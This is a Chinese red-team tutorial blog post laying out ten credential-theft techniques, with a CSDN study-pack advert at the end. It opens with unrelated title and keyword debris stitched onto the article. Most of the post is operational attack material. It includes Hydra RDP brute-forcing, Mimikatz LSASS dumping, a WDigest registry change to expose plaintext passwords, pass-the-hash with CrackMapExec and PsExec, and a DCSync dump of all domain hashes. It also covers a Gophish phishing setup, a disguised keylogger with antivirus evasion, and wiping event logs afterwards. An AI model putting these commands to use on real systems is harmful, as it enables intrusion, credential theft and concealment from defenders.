企业官网建设流程全解析

完整网站开发需要多久,wordpress 知更鸟 lts,互联网产品运营是做什么的,知名品牌营销策划案例序章#xff1a;我从 “拿 shell 就停” 到 “追凭证到底” 的红队觉醒 刚做红队时#xff0c;我总陷入一个误区#xff1a;拿到目标机器的 WebShell 就沾沾自喜#xff0c;以为 “拿下了主机”。直到某次项目#xff0c;客户内网做了严格的分段隔离#xff0c;我拿着单…序章我从 “拿 shell 就停” 到 “追凭证到底” 的红队觉醒刚做红队时我总陷入一个误区拿到目标机器的 WebShell 就沾沾自喜以为 “拿下了主机”。直到某次项目客户内网做了严格的分段隔离我拿着单台机器的权限寸步难行 —— 想横向移动到数据库服务器缺账号密码想登录域控连基本的域账号都没有。带队的老红队工程师看着我手足无措的样子说“红队的核心不是‘拿一台机器’是‘掌控整个内网’而凭证就是打开内网大门的钥匙。” 那天他用 Mimikatz 从内存里抓取到本地管理员 hash再通过 Pass-the-HashPtH登录了相邻的文件服务器整个过程不到 5 分钟。从那以后我开始深耕 “凭证获取”在 10 红队项目里总结出 10 个实战方法 —— 从零基础能上手的弱口令爆破到需要进阶技巧的域控凭证抓取每个方法都附具体步骤、工具和避坑指南。这篇文章帮你从 “只会拿 shell” 的新手变成 “能掌控内网凭证” 的红队选手。一、先搞懂红队为什么要拼了命拿凭证在讲方法前必须先明确一个核心逻辑凭证比 shell 更重要。对红队而言“shell 是临时的凭证是长久的”—— 机器重启后 shell 可能消失但拿到的账号密码、hash 值能反复登录内网机器甚至直接拿下域控。先看一张红队凭证获取的核心链路图理解凭证在整个攻防中的作用从链路能看出每一步都依赖 “前一步获取的凭证”。比如没有本地管理员凭证就无法横向移动没有域账号凭证就碰不到域控的边。对零基础来说不用一开始就追求 “域控凭证”先从 “本地凭证获取” 入手逐步进阶。下面 10 个方法按 “基础→进阶→高阶” 排序每个方法都标注了难度和适用场景。二、红队凭证获取 10 个实战方法附零基础操作指南方法 1弱口令爆破 —— 零基础最易上手成功率却不低原理利用用户设置的简单密码如 123456、admin123通过工具批量尝试登录获取合法凭证。难度★☆☆☆☆零基础 1 小时就能上手适用场景远程登录服务RDP、SSH、数据库MySQL、MSSQL、Web 后台OA、CMS实战步骤以 RDP 爆破为例准备工具Hydra跨平台爆破工具支持 RDP/SSH/MySQL 等、用户名字典user.txt如 admin、administrator、密码字典pass.txt推荐 Top1000 弱口令执行爆破命令hydra -L user.txt -P pass.txt192.168.1.100 rdp -vV -o rdp_success.txt-L指定用户名字典-P指定密码字典rdp目标服务类型-vV显示详细过程-o保存成功结果查看结果打开 rdp_success.txt会显示 “administrator:123456192.168.1.100” 这类成功的凭证。我的实战案例某次医疗行业红队项目我用 Hydra 爆破客户内网 192.168.3.0/24 段的 RDP 服务1 小时内就拿到 3 台机器的 administrator 账号密码都是 “hospital2023”直接通过远程桌面登录省去了找 Web 漏洞的时间。注意事项避免 “暴力跑全量字典”用小字典如 Top500 弱口令先测试减少日志告警针对行业定制字典比如教育行业用 “school 年份”school2024金融行业用 “bank 密码”bank123。方法 2配置文件泄露 —— 从代码里 “捡” 现成凭证原理开发人员常把账号密码写在配置文件里如 Web 的 config.php、Windows 的.ini 文件若配置文件被泄露就能直接拿到凭证。难度★★☆☆☆需会用目录扫描工具适用场景Web 服务器、应用服务器Tomcat、JBoss实战步骤以 Web 配置文件为例扫描 Web 目录用 dirsearch 工具扫描目标网站寻找敏感配置文件命令python3 dirsearch.py -u http://192.168.1.101 -e php,ini,conf -w common.txt-e指定文件后缀-w指定目录字典下载配置文件若扫描到 “/config.php”直接访问该路径下载文件打开后搜索 “username”“password” 关键词比如php$db_userroot;$db_passmysql2024!;$db_host192.168.1.102:3306;验证凭证用 Navicat 连接 192.168.1.102 的 MySQL输入 root 和 mysql2024!成功登录后可读取数据库甚至通过 UDF 提权拿到服务器权限。避坑指南有些配置文件会加密如用 base64遇到 “SGVsbG8xMjM” 这类字符串用 base64 解码工具https://base64.us/解密Windows 配置文件位置重点找 “C:\Program Files\ 应用名 \config.ini”“C:\inetpub\wwwroot\web.config”。方法 3键盘记录 —— 悄无声息抓明文密码原理在目标机器植入键盘记录工具记录用户输入的账号密码如登录 QQ、浏览器、远程桌面时的输入适合无法直接抓取 hash 的场景。难度★★☆☆☆需简单免杀处理适用场景有本地交互的机器如员工办公电脑、无法抓取 hash 的高版本 WindowsWin10/11实战步骤选择工具推荐微步键盘记录器免费版足够用、Ardamax Keylogger功能更全需破解生成 payload打开工具设置 “记录保存路径”如 C:\Windows\Temp\log.txt、“自动发送日志到邮箱”避免手动取文件生成 exe 文件植入目标机器通过 WebShell 上传 payload或伪装成 “工作文档.exe” 诱导用户双击运行获取日志若设置了邮箱发送会收到包含键盘记录的邮件比如“2024-05-20 14:30: 远程桌面登录usernameadminpasswordAdmin1234”。我的踩坑经历刚开始用未免杀的键盘记录器上传到目标机器就被 360 拦截。后来用 “UPX 加壳 资源修改”把 exe 图标改成 Word 图标成功率提升到 80%—— 新手一定要做基础免杀不然工具根本跑不起来。方法 4内存取证 —— 用 Mimikatz 抓 hash / 明文密码原理Windows 系统会把用户登录密码暂存到内存中如 LSASS 进程通过 Mimikatz 读取内存数据可获取 NTLM hash 或明文密码是红队最常用的凭证获取手段。难度★★★☆☆需了解 Windows 权限适用场景Windows XP/7/10/11Win10/11 需关闭 WDAC 或用特殊版本 Mimikatz实战步骤上传 Mimikatz通过 WebShell 或远程桌面把 mimikatz.exe 传到目标机器的 C:\Windows\Temp 目录运行 Mimikatz 并提权打开 cmd切换到 Temp 目录执行命令mimikatz.exe privilege::debug # 开启调试权限必须执行否则报错 sekurlsa::logonPasswords # 读取内存中的凭证提取凭证命令执行后会显示所有登录用户的信息重点看 “NTLM”hash 值和 “Password”明文密码比如“Username: AdministratorNTLM: 32ed87bdb5fdc5e9cba88547376818d4Password: Win2024!”。关键技巧Win10/11 抓不到明文密码因为微软默认禁用了内存明文存储需先执行命令开启reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f执行后需用户重新登录才生效免杀 Mimikatz用 “mimikatz_trunk_x64.exe”免杀版本或把 Mimikatz 注入到正常进程如 notepad.exe中运行躲避杀毒软件。方法 5Pass-the-HashPtH—— 用 hash 代替明文登录原理Windows 登录时会验证 NTLM hash而非明文密码。拿到目标机器的 NTLM hash 后无需破解直接用工具如 PsExec、CrackMapExec模拟登录避免 “明文密码难获取” 的问题。难度★★★☆☆需掌握 hash 传递工具适用场景已获取目标机器 NTLM hash但无明文密码且目标开启了 SMB 服务445 端口实战步骤以 CrackMapExec 为例准备工具CrackMapExec简称 CME跨平台工具支持 hash 传递需提前安装 Python 环境执行 hash 传递命令crackmapexec smb192.168.1.0/24 -u administrator -H 32ed87bdb5fdc5e9cba88547376818d4 --shares-u目标用户名-HNTLM hash 值--shares查看目标机器的共享目录登录目标机器若显示 “[] 192.168.1.103:445 - Success”说明 hash 传递成功可进一步用 PsExec 获取 shellpsexec.exe \\192.168.1.103 -u administrator -p -h cmd.exe # -p 表示用hash登录实战场景某次项目我拿到一台 Win7 机器的 administrator hash无明文密码用 CME 扫描内网 192.168.2.0/24 段发现有 5 台机器用了相同的 hash直接批量登录2 小时内拿下整个部门的机器 ——hash 传递的效率远超逐台爆破。方法 6钓鱼攻击 —— 诱导用户 “主动交凭证”原理制作伪装的登录页面如企业 OA、邮箱登录页或恶意附件通过邮件 / 聊天工具发给目标用户诱导用户输入账号密码从而获取凭证。是红队 “从外到内” 获取域账号的核心方法。难度★★★☆☆需搭建钓鱼平台适用场景无初始立足点需从外部突破内网需获取高权限域账号如财务、IT 管理员实战步骤用 Gophish 搭建钓鱼平台搭建 Gophish在 VPS 上部署 GophishDocker 版最方便命令docker run -d -p3333:3333 -p80:80 --name gophish jordan-wright/gophish访问 http://VPSIP:3333 登录 Gophish 后台默认账号 admin密码在日志中查看制作钓鱼模板新建 “Email Template”伪装成企业 IT 部门的 “OA 系统升级通知”内容含钓鱼链接如 http://VPSIP/login新建 “Landing Page”复制真实 OA 登录页的 HTML 代码修改表单提交地址为 Gophish用户输入的凭证会被记录发送钓鱼邮件导入目标用户邮箱列表选择模板和链接点击发送查看结果在 Gophish 后台的 “Results” 中可看到 “谁点击了链接”“输入了什么凭证”比如 “userzhang3passwordZhangOA2024”。优化技巧钓鱼链接伪装用短链接工具如tinyurl.com把 VPSIP 改成 “企业相关域名”如oa-update.company.com附件钓鱼把恶意宏文件如 “2024 年工资表.docm”作为附件用户启用宏后自动记录键盘或上传凭证到 VPS。方法 7数据库凭证窃取 —— 从数据库里 “扒” 高权限账号原理很多应用会把管理员账号、域账号存储在数据库中如 CMS 的管理员表、ERP 的用户表拿到数据库权限后可直接读取这些凭证进而登录其他系统。难度★★★☆☆需会操作数据库适用场景已获取数据库权限如 MySQL、MSSQL且数据库中存储了敏感账号。实战步骤以 MySQL 为例登录数据库用 Navicat 或 cmd 登录 MySQL命令mysql -h192.168.1.102 -u root -p# 输入密码mysql2024!查找敏感表执行命令查看所有数据库和表重点找 “user”“admin”“manager” 相关的表showdatabases;# 查看数据库如cms_dbuse cms_db;# 切换到cms_db数据库showtables;# 查看表如cms_admin读取凭证查询 cms_admin 表的内容命令selectusername,passwordfromcms_admin;若密码是明文直接获取若加密如 MD5用在线破解工具https://www.cmd5.com/解密比如 “e10adc3949ba59abbe56e057f20f883e” 解密后是 “123456”。扩展场景MSSQL 数据库更 “值钱”—— 很多企业会把域账号作为 MSSQL 的 “Windows 身份验证” 账号若拿到 MSSQL 的 sysadmin 权限可执行 “xp_cmdshell” 获取服务器 shell进而抓取域账号凭证。方法 8第三方应用凭证获取 —— 从 “弱配置” 应用里找漏洞原理目标机器上的第三方应用如浏览器、FTP 客户端、VPN 软件会保存用户登录凭证通过工具读取这些应用的配置文件或注册表可获取明文凭证。难度★★★★☆需了解应用存储机制适用场景目标机器安装了常用客户端软件如 Chrome、FileZilla、AnyConnect实战步骤以 Chrome 浏览器为例定位凭证存储路径Chrome 的密码存储在 “C:\Users\ 用户名 \AppData\Local\Google\Chrome\User Data\Default\Login Data”SQLite 数据库文件读取数据库用 SQLite Browser 打开 Login Data 文件查询 “logins” 表字段 “origin_url” 是网站地址“username_value” 是账号“password_value” 是加密后的密码解密密码Chrome 的密码用 Windows 的 DPAPI 加密需在目标机器上用工具解密推荐 “ChromePass”运行后直接显示明文密码比如 “origin_urlhttps://mail.qq.comusername123456qq.compasswordQq123456”。常用工具列表目标应用工具推荐凭证存储位置Chrome/FirefoxChromePass、FirefoxPasswordViewAppData 目录下的 SQLite 文件FileZillaFileZilla Password Decryptor%APPDATA%\FileZilla\recentservers.xmlVPNAnyConnectAnyConnect Password Viewer注册表HKCU\Software\Cisco\AnyConnect方法 9域控凭证抓取 —— 用 DCSync “复制” 域内全量凭证原理域控DC存储了所有域用户的 NTLM hash通过 DCSync 攻击模拟域控之间的同步行为可从域控上 “复制” 所有用户的凭证是红队 “拿下整个域” 的终极手段。难度★★★★★需高权限且有域环境适用场景已获取域内高权限账号如 Domain Admin需获取全量域用户凭证实战步骤用 Mimikatz 执行 DCSync确保账号权限必须使用 Domain Admin 权限的账号登录域内机器非域控也可执行 DCSync 命令mimikatz.exe privilege::debug lsadump::dcsync /domain:company.com /user:krbtgt # 获取krbtgt账号hash用于黄金票据 lsadump::dcsync /domain:company.com /all /csv # 获取所有域用户凭证保存为CSV文件提取凭证命令执行后会输出所有域用户的 NTLM hash、SID 等信息比如 “krbtgt:502:NTLM8846f7eaee8fb11d1206b6e4f1529d3a2:::”—— 拿到 krbtgt hash 后可制作黄金票据实现 “无凭证登录任何域内机器”。风险提示DCSync 攻击会在域控日志中留下明显痕迹Event ID 4662、5140需在执行后清理日志用 wevtutil 命令且仅在红队项目后期使用避免提前暴露。方法 10云环境凭证窃取 —— 从云服务器 / 容器里找密钥原理云环境如 AWS、阿里云、腾讯云的凭证如 AccessKey、SecretKey常被开发人员硬编码在配置文件或环境变量中拿到这些凭证后可登录云控制台控制云资源如 ECS、RDS。难度★★★★☆需了解云环境适用场景目标使用云服务需获取云资源控制权实战步骤以阿里云为例查找 AccessKey配置文件查看 “/root/.aliyun/config.json”Linux或 “C:\Users\ 用户名.aliyun\config.json”Windows环境变量执行echo $ALIYUN_ACCESS_KEY_IDLinux或set ALIYUNWindows查看是否有云凭证代码文件搜索项目代码中的 “accessKeyId”“secretAccessKey” 关键词比如 Java 代码中的StringaccessKeyIdLTAI5tFxxxxxxxxx;StringsecretAccessKey8xxxxxxxxx;验证凭证权限登录阿里云控制台https://console.aliyun.com输入 AccessKey 和 SecretKey查看权限如是否能管理 ECS、修改安全组扩展攻击用阿里云 CLI 工具执行命令比如列出所有 ECS 实例aliyun ecs DescribeInstances --RegionId cn-beijing --AccessKeyId LTAI5tFxxxxxxxxx --AccessKeySecret 8xxxxxxxxx常见云凭证位置云厂商凭证类型常见存储位置阿里云AccessKey/SecretKey~/.aliyun/config.json、环境变量、代码文件AWSAWS_ACCESS_KEY_ID/AWS_SECRET_ACCESS_KEY~/.aws/credentials、EC2 实例元数据腾讯云SecretId/SecretKey~/.tccli/default.config、环境变量三、10 个方法对比与零基础学习路径1. 方法对比表帮你快速选对方案方法难度隐蔽性适用场景核心工具弱口令爆破★☆☆☆☆低易触发日志告警远程服务、Web 后台Hydra、Medusa配置文件泄露★★☆☆☆高无交互难察觉Web 服务器、应用服务器dirsearch、Burp Suite键盘记录★★☆☆☆中需运行 payload办公电脑、高版本 Windows微步键盘记录器、Ardamax内存取证Mimikatz★★★☆☆中需提权易被查杀所有 Windows 系统MimikatzPass-the-Hash★★★☆☆高无明文传输已获取 NTLM hash需横向移动CrackMapExec、PsExec钓鱼攻击★★★☆☆高用户主动配合外部突破、获取域账号Gophish、Empire数据库凭证窃取★★★☆☆高仅操作数据库已获取数据库权限Navicat、SQLite Browser第三方应用凭证★★★★☆高工具轻量难察觉安装客户端软件的机器ChromePass、FileZilla Decryptor域控 DCSync★★★★★低日志痕迹明显域环境需全量域凭证Mimikatz、Cobalt Strike云环境凭证窃取★★★★☆高无交互仅读文件云服务器、容器环境文本编辑器、云 CLI 工具!四、红队凭证获取的 3 个核心原则新手必看合法合规是底线所有测试必须获取客户书面授权禁止对未授权目标下手 —— 我曾见过有人用钓鱼攻击测试朋友公司结果被网警传唤面临行政处罚隐蔽性优先能抓 hash 就不抓明文能 hash 传递就不爆破能钓鱼就不直接攻击 —— 比如用 Mimikatz 时尽量注入到正常进程如 notepad避免直接运行 exe 触发杀毒软件凭证要 “复用”拿到一个凭证后先用 CME 扫描内网看是否能登录多台机器很多企业会用统一密码避免重复劳动 —— 我曾用一个域账号的 hash登录了内网 23 台机器效率极高。结语凭证是红队的 “核武器”但技术之外更需思维做红队 3 年我最大的感悟是凭证获取不只是 “用工具”更是 “猜人心”—— 弱口令是因为用户 “怕麻烦”配置文件泄露是因为开发 “图省事”钓鱼成功是因为用户 “信权威”。对零基础来说不用一开始就追求 “DCSync”“黄金票据” 这些高阶技巧先把 “弱口令爆破”“配置文件泄露” 练熟在实战中积累经验。当你能从 “每一个细节” 里找到凭证比如从 Web 注释里发现密码、从员工聊天记录里猜出口令你就真正掌握了红队凭证获取的核心能力。最后送新手一句话“红队的终极目标不是‘破坏’而是‘发现漏洞并帮助修复’—— 凭证是我们的工具而责任感才是我们的底线。”如何学习黑客/网络安全网络安全不是「速成黑客」而是守护数字世界的骑士修行。当你第一次用自己写的脚本检测出漏洞时那种创造的快乐远胜于电影里的炫技。装上虚拟机从配置第一个Linux环境开始脚踏实地从基础命令学起相信你一定能成为一名合格的黑客。如果你还不知道从何开始我自己整理的282G的网络安全教程可以分享我也是一路自学走过来的很清楚小白前期学习的痛楚你要是没有方向还没有好的资源根本学不到东西下面是我整理的网安资源希望能帮到你。需要的话可以V扫描下方二维码联系领取~如果二维码失效可以点击下方链接去拿一样的哦【CSDN大礼包】最新网络安全/网安技术资料包~282G无偿分享1.从0到进阶主流攻防技术视频教程包含红蓝对抗、CTF、HW等技术点2.入门必看攻防技术书籍pdf书面上的技术书籍确实太多了这些是我精选出来的还有很多不在图里3.安装包/源码主要攻防会涉及到的工具安装包和项目源码防止你看到这连基础的工具都还没有4.面试试题/经验网络安全岗位面试经验总结谁学技术不是为了赚$呢找个好的岗位很重要需要的话可以V扫描下方二维码联系领取~因篇幅有限资料较为敏感仅展示部分资料添加上方即可获取如果二维码失效可以点击下方链接去拿一样的哦【CSDN大礼包】最新网络安全/网安技术资料包~282G无偿分享